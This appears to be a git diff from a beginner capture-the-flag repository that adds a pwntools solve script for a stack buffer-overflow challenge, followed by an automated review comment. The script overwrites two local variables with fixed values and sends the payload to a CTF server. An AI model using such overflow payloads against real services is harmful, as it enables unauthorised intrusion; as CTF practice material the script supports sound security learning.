First CTFs
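--- a/BOF/06_cosmic_burger_joint/.gdb_history
+++ b/BOF/06_cosmic_burger_joint/.gdb_history
@@ -0,0 +1,4 @@
+run
+quit
+disass vuln
+quit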
BIN
BOF/06_cosmic_burger_joint/cosmic_burger
Executable file
BIN
BOF/06_cosmic_burger_joint/cosmic_burger
Executable file
Binary file not shown.
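--- a/BOF/06_cosmic_burger_joint/solve.py
+++ b/BOF/06_cosmic_burger_joint/solve.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./cosmic_burger", checksec=False)
+
+p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13529)
+# Your exploit here
+OFFSET = 40
+# mov eax,DWORD PTR [rbp-0x4]
+# cmp eax,0xbeef
+# jne 0x12f2 <vuln+196>
+# mov eax,DWORD PTR [rbp-0x8]
+# cmp eax,0xf00d
+first = 0xBEEF
+second = 0xF00D
+payload = flat(
+b"A" * OFFSET,
+p32(second),
+p32(first),
+)
+p.send(payload)
+p.interactive()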
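Review bot: `p = process(elf.path)` is rebound by `p = remote(...)` on the very next line, so every run spawns a local process that is never used or closed, and the script always connects to the remote host even when you only want to test locally. Select one target per run instead, for example `p = remote("offsec.m0lecon.it", 13529) if args.REMOTE else process(elf.path)`. The quoted disassembly shows only the two compares, so a comment above `payload` should record how `OFFSET = 40` was derived and that `second` is packed before `first` because `[rbp-0x8]` sits below `[rbp-0x4]` on the stack. Separately, `p.send(payload)` is issued without waiting for any prompt; if the binary prints one before reading (not visible here), synchronising on it first would make the script less timing-dependent.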